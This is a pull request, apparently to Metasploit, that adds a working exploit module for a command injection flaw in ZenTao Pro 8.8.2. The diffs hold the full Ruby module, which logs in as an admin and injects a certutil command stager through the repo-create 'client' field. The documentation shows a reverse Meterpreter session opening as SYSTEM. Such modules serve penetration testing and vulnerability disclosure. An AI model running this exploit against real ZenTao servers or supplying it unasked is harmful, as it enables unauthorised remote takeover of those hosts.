### PR TITLE
Add ZenTao Pro 8.8.2 Remote Code Execution module and docs

### DIFF
--- a/documentation/modules/exploit/windows/http/zentao_pro_rce.md
+++ b/documentation/modules/exploit/windows/http/zentao_pro_rce.md
@@ -1,0 +1,100 @@
+## Vulnerable Application
+This module exploits a command injection vulnerability in ZenTao Pro 8.8.2 and earlier versions in order to execute arbitrary commands with
+SYSTEM privileges.
+          
+The module first tries to obtain the ZenTao Pro version from /pro/user-login.html. If a vulnerable version is found,
+it attempts to authenticate to the ZenTao dashboard. It then tries to execute the payload by submitting fake repositories via
+the 'Repo Create' function that is accessible from the dashboard via CI>Repo.
+More precisely, the module sends HTTP POST requests to '/pro/repo-create.html' that inject commands in the vulnerable 'path'
+parameter which corresponds to the 'Client Path' input field.
+
+Valid credentials for a ZenTao admin account are required. This module has been successfully tested against ZenTao 8.8.1 and 8.8.2
+running on Windows 10 (XAMPP server).
+
+## Verification Steps
+1. Install the module as usual
+2. Start msfconsole
+3. Do: `use exploit/windows/http/zentao_pro_rce`
+4. Do: `set RHOSTS [IP]`
+5. Do: `set USERNAME [username for the ZenTao Pro account]`
+6. Do: `set PASSWORD [password for the ZenTao Pro account]`
+7. Do: `set RHOSTS [IP]`
+8. Do: `set payload [payload]`
+9. Do: `set LHOST [IP]`
+10. Do: `exploit`
+
+## Options
+### PASSWORD
+The password for the ZenTao Pro account to authenticate with. This option is required.
+### TARGETPATH
+The path on the target where commands will be executed. The default value is `C:\`.
+### TARGETURI
+The base path to ZenTao Pro. The default value is `/pro/`.
+### USERNAME
+The username for the ZenTao Pro account to authenticate with. This option is required.
+
+## Targets
+```
+Id  Name
+--  ----
+0   Windows (x86)
+1   Windows (x64)
+```
+
+## Scenarios
+### ZenTao 8.8.2 running on Windows 10 (XAMPP server)
+```
+msf5 exploit(windows/http/zentao_pro_rce) > show options
+
+Module options (exploit/windows/http/zentao_pro_rce):
+
+   Name        Current Setting  Required  Description
+   ----        ---------------  --------  -----------
+   PASSWORD    zentao123        yes       Password to authenticate with
+   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS      192.168.9.14     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT       80               yes       The target port (TCP)
+   SRVHOST     0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT     8080             yes       The local port to listen on.
+   SSL         false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETPATH  C:\              yes       The path on the target where commands will be executed
+   TARGETURI   /pro/            yes       The base path to ZenTao
+   URIPATH                      no        The URI to use for this exploit (default is random)
+   USERNAME    admin            yes       Username to authenticate with
+   VHOST                        no        HTTP server virtual host
+
+
+Payload options (windows/x64/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     192.168.1.12     yes       The listen address (an interface may be specified)
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Windows (x64)
+
+
+msf5 exploit(windows/http/zentao_pro_rce) > run
+
+[*] Started reverse TCP handler on 192.168.1.12:4444 
+[+] Successfully authenticated to ZenTao 8.8.2.
+[*] Executing the payload...
+[*] Command Stager progress -  20.97% done (2049/9770 bytes)
+[*] Command Stager progress -  41.94% done (4098/9770 bytes)
+[*] Command Stager progress -  62.92% done (6147/9770 bytes)
+[*] Command Stager progress -  83.89% done (8196/9770 bytes)
+[*] Command Stager progress - 100.15% done (9785/9770 bytes)
+[*] Sending stage (201283 bytes) to 192.168.9.14
+[*] Meterpreter session 1 opened (192.168.1.12:4444 -> 192.168.9.14:50506) at 2020-07-08 15:01:22 -0400
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+
+```

--- a/documentation/modules/exploit/windows/http/zentao_pro_rce.md
+++ b/documentation/modules/exploit/windows/http/zentao_pro_rce.md
@@ -11,7 +11,13 @@ parameter which corresponds to the 'Client Path' input field.
 Valid credentials for a ZenTao admin account are required. This module has been successfully tested against ZenTao 8.8.1 and 8.8.2
 running on Windows 10 (XAMPP server).
 
-Vulnerable software for testing can be downloaded here https://www.zentao.pm/download.html and here: https://sourceforge.net/projects/zentao/. The easiest way to install the application is by downloading the 'One-Click Installation Package for Windows'. The package for ZenTao 8.8.2 is available here: https://www.zentao.pm/download/scrum-tool-team-collaboration-ztp8.8.2-413.html. Installation is then just a matter of unzipping the package, launching the ZenTao Runner control panel via `Xampp\ start.exe` and finally configuring and starting the server from ZenTao Runner. Detailed instructions are available here: https://www.zentao.pm/book/zentaomanual/zentao-one-click-install-win-13.html.
+Vulnerable software for testing can be downloaded here https://www.zentao.pm/download.html and here:
+https://sourceforge.net/projects/zentao/.
+The easiest way to install the application is by downloading the 'One-Click Installation Package for Windows'.
+The package for ZenTao 8.8.2 is available here: https://www.zentao.pm/download/scrum-tool-team-collaboration-ztp8.8.2-413.html.
+Installation is then just a matter of unzipping the package, launching the ZenTao Runner control panel via `Xampp\ start.exe`
+and finally configuring and starting the server from ZenTao Runner. Detailed instructions are available here:
+https://www.zentao.pm/book/zentaomanual/zentao-one-click-install-win-13.html.
 
 ## Verification Steps
 1. Install the module as usual

--- a/documentation/modules/exploit/windows/http/zentao_pro_rce.md
+++ b/documentation/modules/exploit/windows/http/zentao_pro_rce.md
@@ -11,6 +11,8 @@ parameter which corresponds to the 'Client Path' input field.
 Valid credentials for a ZenTao admin account are required. This module has been successfully tested against ZenTao 8.8.1 and 8.8.2
 running on Windows 10 (XAMPP server).
 
+Vulnerable software for testing can be downloaded here https://www.zentao.pm/download.html and here: https://sourceforge.net/projects/zentao/. The easiest way to install the application is by downloading the 'One-Click Installation Package for Windows'. The package for ZenTao 8.8.2 is available here: https://www.zentao.pm/download/scrum-tool-team-collaboration-ztp8.8.2-413.html. Installation is then just a matter of unzipping the package, launching the ZenTao Runner control panel via `Xampp\ start.exe` and finally configuring and starting the server from ZenTao Runner. Detailed instructions are available here: https://www.zentao.pm/book/zentaomanual/zentao-one-click-install-win-13.html.
+
 ## Verification Steps
 1. Install the module as usual
 2. Start msfconsole

--- a/documentation/modules/exploit/windows/http/zentao_pro_rce.md
+++ b/documentation/modules/exploit/windows/http/zentao_pro_rce.md
@@ -11,13 +11,13 @@ parameter which corresponds to the 'Client Path' input field.
 Valid credentials for a ZenTao admin account are required. This module has been successfully tested against ZenTao 8.8.1 and 8.8.2
 running on Windows 10 (XAMPP server).
 
-Vulnerable software for testing can be downloaded here https://www.zentao.pm/download.html and here:
-https://sourceforge.net/projects/zentao/.
+Vulnerable software for testing can be downloaded [here](https://www.zentao.pm/download.html)
+and [here](https://sourceforge.net/projects/zentao/).
 The easiest way to install the application is by downloading the 'One-Click Installation Package for Windows'.
-The package for ZenTao 8.8.2 is available here: https://www.zentao.pm/download/scrum-tool-team-collaboration-ztp8.8.2-413.html.
+The package for ZenTao 8.8.2 is available [here](https://www.zentao.pm/download/scrum-tool-team-collaboration-ztp8.8.2-413.html).
 Installation is then just a matter of unzipping the package, launching the ZenTao Runner control panel via `Xampp\ start.exe`
-and finally configuring and starting the server from ZenTao Runner. Detailed instructions are available here:
-https://www.zentao.pm/book/zentaomanual/zentao-one-click-install-win-13.html.
+and finally configuring and starting the server from ZenTao Runner. Detailed instructions are available [here]
+(https://www.zentao.pm/book/zentaomanual/zentao-one-click-install-win-13.html).
 
 ## Verification Steps
 1. Install the module as usual

--- a/modules/exploits/windows/http/zentao_pro_rce.rb
+++ b/modules/exploits/windows/http/zentao_pro_rce.rb
@@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::CmdStager
+  prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
     super(
@@ -72,9 +73,6 @@ class MetasploitModule < Msf::Exploit::Remote
       OptString.new('TARGETPATH', [true, 'The path on the target where commands will be executed', 'C:\\']),
       OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']),
       OptString.new('PASSWORD', [true, 'Password to authenticate with', ''])
-    ]
-    register_advanced_options [
-      OptBool.new('ForceExploit', [false, 'Override check result', false])
     ]
   end
 
@@ -242,13 +240,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    unless [CheckCode::Detected, CheckCode::Appears].include? check
-      unless datastore['ForceExploit']
-        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
-      end
-      print_warning 'Target does not appear to be vulnerable'
-    end
-
     login
     print_status('Executing the payload...')
     execute_cmdstager(background: true)

--- a/modules/exploits/windows/http/zentao_pro_rce.rb
+++ b/modules/exploits/windows/http/zentao_pro_rce.rb
@@ -1,0 +1,256 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'ZenTao Pro 8.8.2 Remote Code Execution',
+        'Description' => %q{
+          This module exploits a command injection vulnerability in ZenTao Pro
+          8.8.2 and earlier versions in order to execute arbitrary commands with
+          SYSTEM privileges.
+
+          The module first attempts to authenticate to the ZenTao dashboard. It
+          then tries to execute the payload by submitting fake repositories via
+          the 'Repo Create' function that is accessible from the dashboard via
+          CI>Repo. More precisely, the module sends HTTP POST requests to
+          '/pro/repo-create.html' that inject commands in the vulnerable 'path'
+          parameter which corresponds to the 'Client Path' input field.
+
+          Valid credentials for a ZenTao admin account are required. This module
+          has been successfully tested against ZenTao 8.8.1 and 8.8.2 running on
+          Windows 10 (XAMPP server).
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Daniel Monzón', # Discovery
+            'Melvin Boers', # PoC
+            'Erik Wynter' # @wyntererik - Metasploit
+          ],
+        'References' =>
+          [
+            ['EDB', '48633'] # PoC
+          ],
+        'Platform' => 'win',
+        'Targets' =>
+          [
+            [
+              'Windows (x86)', {
+                'Arch' => [ARCH_X86],
+                'CmdStagerFlavor' => :certutil,
+                'DefaultOptions' => {
+                  'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
+                }
+              }
+            ],
+            [
+              'Windows (x64)', {
+                'Arch' => [ARCH_X64],
+                'CmdStagerFlavor' => :certutil,
+                'DefaultOptions' => {
+                  'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
+                }
+              }
+            ]
+          ],
+        'DefaultTarget' => 1,
+        'DisclosureDate' => 'Jun 2020'
+      )
+    )
+
+    register_options [
+      OptString.new('TARGETURI', [true, 'The base path to ZenTao', '/pro/']),
+      OptString.new('TARGETPATH', [true, 'The path on the target where commands will be executed', 'C:\\']),
+      OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']),
+      OptString.new('PASSWORD', [true, 'Password to authenticate with', ''])
+    ]
+    register_advanced_options [
+      OptBool.new('ForceExploit', [false, 'Override check result', false])
+    ]
+  end
+
+  def check
+    vprint_status('Running check')
+
+    # visit login the page to get the necessary cookies
+    res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'user-login.html')
+    unless res
+      return CheckCode::Unknown('Connection failed')
+    end
+
+    cookie = res.get_cookies
+    if cookie.blank?
+      return CheckCode::Unknown('Unable to retrieve HTTP cookie header')
+    end
+
+    # check if the language is set to English, otherwise change it to English
+    unless cookie.scan(/lang=(.*?);/).flatten.first == 'en-US'
+      cookie.gsub!(/lang=(.*?);/, 'lang=en;')
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'score-ajax-selectLang.html'),
+        'cookie' => cookie
+      })
+
+      unless res
+        return CheckCode::Unknown('Connection failed')
+      end
+
+      @cookie = res.get_cookies
+      if @cookie.blank?
+        return CheckCode::Unknown('Unable to change the application language to English. Target may not be a ZenTao application')
+      end
+    end
+
+    # visit login page to check ZenTao version
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'user-login.html'),
+      'cookie' => @cookie
+    })
+
+    unless res
+      return CheckCode::Unknown('Connection failed')
+    end
+
+    unless res.code == 200 && res.body.include?('Login - ZenTao')
+      return CheckCode::Safe('Target is not a ZenTao application.')
+    end
+
+    # obtain cookie and random value necessary to autenticate later
+    @cookie = res.get_cookies
+    html = res.get_html_document
+    @random_value = html.at('input[@name="verifyRand"]')['value']
+    if @cookie.blank? || @random_value.blank?
+      return CheckCode::Unknown('Unable to obtain the tokens required for authentication')
+    end
+
+    # obtain version
+    version = res.body.scan(/v=pro(.*?)'/).flatten.first
+    if version.blank?
+      return CheckCode::Detected('Unable to obtain ZenTao version.')
+    end
+
+    @version = Gem::Version.new(version)
+
+    unless @version <= Gem::Version.new('8.8.2')
+      return CheckCode::Detected("Target is ZenTao version #{@version}.")
+    end
+
+    return CheckCode::Appears("Target is ZenTao version #{@version}.")
+
+  end
+
+  def login
+    # generate md5 hashes required for authentication
+    hashed_pass = Digest::MD5.hexdigest(datastore['PASSWORD'].to_s)
+    final_hash = Digest::MD5.hexdigest("#{hashed_pass}#{@random_value}")
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'user-login.html'),
+      'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8',
+      'cookie' => @cookie,
+      'headers' => {
+        'Accept' => 'application/json, text/javascript, */*; q=0.01',
+        'Referer' => "http://#{datastore['RHOSTS']}#{normalize_uri(target_uri.path, 'user-login')}",
+        'X-Requested-With' => 'XMLHttpRequest',
+        'Origin' => "http://#{datastore['RHOSTS']}",
+        'Accept-Encoding' => 'gzip, deflate',
+        'Accept-Language' => 'en-US,en;q=0.9'
+      },
+      'vars_post' => {
+        'account' => datastore['USERNAME'],
+        'password' => final_hash,
+        'passwordStrength' => '1',
+        'referer' => '/pro/',
+        'verifyRand' => @random_value,
+        'KeepLogin' => '0'
+      }
+    })
+
+    unless res
+      return CheckCode::Unknown('Connection failed')
+    end
+
+    unless res.code == 200 && res.body.include?('success')
+      return CheckCode::Unknown('Failed to authenticate. Please check if you have set the correct username and password.')
+    end
+
+    # visit /pro/, which is required to get to the dashboard at /pro/my/
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path),
+      'cookie' => @cookie,
+      'headers' => {
+        'Upgrade-Insecure-Requests' => '1',
+        'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
+        'Referer' => "http://#{datastore['RHOSTS']}#{normalize_uri(target_uri.path, 'user-login')}",
+        'Accept-Encoding' => 'gzip, deflate',
+        'Accept-Language' => 'en-US,en;q=0.9'
+      }
+    })
+
+    unless res && res.code == 302
+      fail_with(Failure::NoAccess, 'Failed to authenticate.')
+    end
+
+    # finally visit /pro/my/ and check if we have been authenticated
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'my'),
+      'cookie' => @cookie
+    })
+    unless res && res.code == 200 && res.body.include?('Dashboard - ZenTao')
+      fail_with(Failure::NoAccess, 'Failed to authenticate.')
+    end
+    print_good("Successfully authenticated to ZenTao #{@version}.")
+  end
+
+  def execute_command(cmd, _opts = {})
+    cmd << ' &&' # this is necessary for the commands to succeed
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'repo-create'),
+      'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8',
+      'cookie' => @cookie,
+      'headers' => {
+        'Accept' => 'application/json, text/javascript, */*; q=0.01',
+        'Referer' => "http://#{datastore['RHOSTS']}#{normalize_uri(target_uri.path, 'repo-create')}",
+        'X-Requested-With' => 'XMLHttpRequest',
+        'Origin' => "http://#{datastore['RHOSTS']}",
+        'Accept-Encoding' => 'gzip, deflate',
+        'Accept-Language' => 'en-US,en;q=0.9'
+      },
+      'vars_post' => {
+        'SCM' => 'Git',
+        'name' => Rex::Text.rand_text_alpha_lower(6..10),
+        'path' => datastore['TARGETPATH'],
+        'encoding' => 'utf-8',
+        'client' => cmd
+      }
+    }, 0) # don't wait for a response from the target, otherwise the module will hang for a few seconds after executing the payload
+  end
+
+  def exploit
+    unless [CheckCode::Detected, CheckCode::Appears].include? check
+      unless datastore['ForceExploit']
+        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
+
+    login
+    print_status('Executing the payload...')
+    execute_cmdstager(background: true)
+  end
+end

--- a/modules/exploits/windows/http/zentao_pro_rce.rb
+++ b/modules/exploits/windows/http/zentao_pro_rce.rb
@@ -39,7 +39,8 @@ class MetasploitModule < Msf::Exploit::Remote
           ],
         'References' =>
           [
-            ['EDB', '48633'] # PoC
+            ['EDB', '48633'], # PoC
+            ['CVE', '2020-7361']
           ],
         'Platform' => 'win',
         'Targets' =>

--- a/modules/exploits/windows/http/zentao_pro_rce.rb
+++ b/modules/exploits/windows/http/zentao_pro_rce.rb
@@ -229,6 +229,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def execute_command(cmd, _opts = {})
+    cmd << ' &&' # this is necessary for compatibility with x86 targets (for x64 the module also works without this)
     send_request_cgi({
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, 'repo-create'),

--- a/modules/exploits/windows/http/zentao_pro_rce.rb
+++ b/modules/exploits/windows/http/zentao_pro_rce.rb
@@ -127,8 +127,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # obtain cookie and random value necessary to autenticate later
     @cookie = res.get_cookies
-    html = res.get_html_document
-    @random_value = html.at('input[@name="verifyRand"]')['value']
+    retrieve_rand_val(res)
     if @cookie.blank? || @random_value.blank?
       return CheckCode::Unknown('Unable to obtain the tokens required for authentication')
     end
@@ -149,7 +148,21 @@ class MetasploitModule < Msf::Exploit::Remote
 
   end
 
+  def retrieve_rand_val(res)
+    html = res.get_html_document
+    @random_value = html.at('input[@name="verifyRand"]')['value']
+
+    fail_with(Failure::NotFound, 'Failed to retrieve token') unless @random_value
+  end
+
   def login
+    unless @random_value
+      res = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'user-login.html'))
+      fail_with(Failure::UnexpectedReply, 'Unable to reach login page') unless res
+      @cookie = res.get_cookies
+      retrieve_rand_val(res)
+    end
+
     # generate md5 hashes required for authentication
     hashed_pass = Digest::MD5.hexdigest(datastore['PASSWORD'].to_s)
     final_hash = Digest::MD5.hexdigest("#{hashed_pass}#{@random_value}")
@@ -161,7 +174,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'cookie' => @cookie,
       'headers' => {
         'Accept' => 'application/json, text/javascript, */*; q=0.01',
-        'Referer' => "http://#{datastore['RHOSTS']}#{normalize_uri(target_uri.path, 'user-login')}",
+        'Referer' => "http://#{datastore['RHOSTS']}#{normalize_uri(target_uri.path, 'user-login.html')}",
         'X-Requested-With' => 'XMLHttpRequest',
         'Origin' => "http://#{datastore['RHOSTS']}",
         'Accept-Encoding' => 'gzip, deflate',
@@ -178,11 +191,11 @@ class MetasploitModule < Msf::Exploit::Remote
     })
 
     unless res
-      return CheckCode::Unknown('Connection failed')
+      fail_with(Failure::Disconnected, 'Connection failed')
     end
 
     unless res.code == 200 && res.body.include?('success')
-      return CheckCode::Unknown('Failed to authenticate. Please check if you have set the correct username and password.')
+      fail_with(Failure::NoAccess, 'Failed to authenticate. Please check if you have set the correct username and password.')
     end
 
     # visit /pro/, which is required to get to the dashboard at /pro/my/
@@ -193,7 +206,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'headers' => {
         'Upgrade-Insecure-Requests' => '1',
         'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
-        'Referer' => "http://#{datastore['RHOSTS']}#{normalize_uri(target_uri.path, 'user-login')}",
+        'Referer' => "http://#{datastore['RHOSTS']}#{normalize_uri(target_uri.path, 'user-login.html')}",
         'Accept-Encoding' => 'gzip, deflate',
         'Accept-Language' => 'en-US,en;q=0.9'
       }
@@ -216,7 +229,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def execute_command(cmd, _opts = {})
-    cmd << ' &&' # this is necessary for the commands to succeed
     send_request_cgi({
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, 'repo-create'),


### PR DESCRIPTION
## About 
This change adds a new module to /modules/exploits/windows/http/ that exploits a command injection vulnerability in ZenTao Pro 8.8.2 and earlier versions in order to execute arbitrary commands with
SYSTEM privileges. The change also adds documentation for this module. The module is based on this PoC: https://www.exploit-db.com/exploits/48633. Because the issue has not been assigned a CVE yet, I contacted the researchers who published the PoC. They said that they disclosed the issue over a month ago, but that the client failed to understand the severity of problem and has not taken any steps to address it. I have also personally informed the vendor about the issue and about the existence of the PoC exploit earlier this week.

## Vulnerable system
ZenTao Pro versions 8.8.1 and 8.8.2 (confirmed) and likely earlier versions as well.

## Verification Steps
1. Install the module as usual
2. Start msfconsole
3. Do: `use exploit/windows/http/zentao_pro_rce`
4. Do: `set RHOSTS [IP]`
5. Do: `set USERNAME [username for the ZenTao Pro account]`
6. Do: `set PASSWORD [password for the ZenTao Pro account]`
7. Do: `set RHOSTS [IP]`
8. Do: `set payload [payload]`
9. Do: `set LHOST [IP]`
10. Do: `exploit`

## Options
### PASSWORD
The password for the ZenTao Pro account to authenticate with. This option is required.
### TARGETPATH
The path on the target where commands will be executed. The default value is `C:\`.
### TARGETURI
The base path to ZenTao Pro. The default value is `/pro/`.
### USERNAME
The username for the ZenTao Pro account to authenticate with. This option is required.

## Targets
```
Id  Name
--  ----
0   Windows (x86)
1   Windows (x64)
```

## Scenarios
### ZenTao 8.8.2 running on Windows 10 (XAMPP server)
```
msf5 exploit(windows/http/zentao_pro_rce) > show options

Module options (exploit/windows/http/zentao_pro_rce):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   PASSWORD    zentao123        yes       Password to authenticate with
   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS      192.168.9.14     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT       80               yes       The target port (TCP)
   SRVHOST     0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   TARGETPATH  C:\              yes       The path on the target where commands will be executed
   TARGETURI   /pro/            yes       The base path to ZenTao
   URIPATH                      no        The URI to use for this exploit (default is random)
   USERNAME    admin            yes       Username to authenticate with
   VHOST                        no        HTTP server virtual host


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.12     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Windows (x64)


msf5 exploit(windows/http/zentao_pro_rce) > run

[*] Started reverse TCP handler on 192.168.1.12:4444 
[+] Successfully authenticated to ZenTao 8.8.2.
[*] Executing the payload...
[*] Command Stager progress -  20.97% done (2049/9770 bytes)
[*] Command Stager progress -  41.94% done (4098/9770 bytes)
[*] Command Stager progress -  62.92% done (6147/9770 bytes)
[*] Command Stager progress -  83.89% done (8196/9770 bytes)
[*] Command Stager progress - 100.15% done (9785/9770 bytes)
[*] Sending stage (201283 bytes) to 192.168.9.14
[*] Meterpreter session 1 opened (192.168.1.12:4444 -> 192.168.9.14:50506) at 2020-07-08 15:01:22 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

```
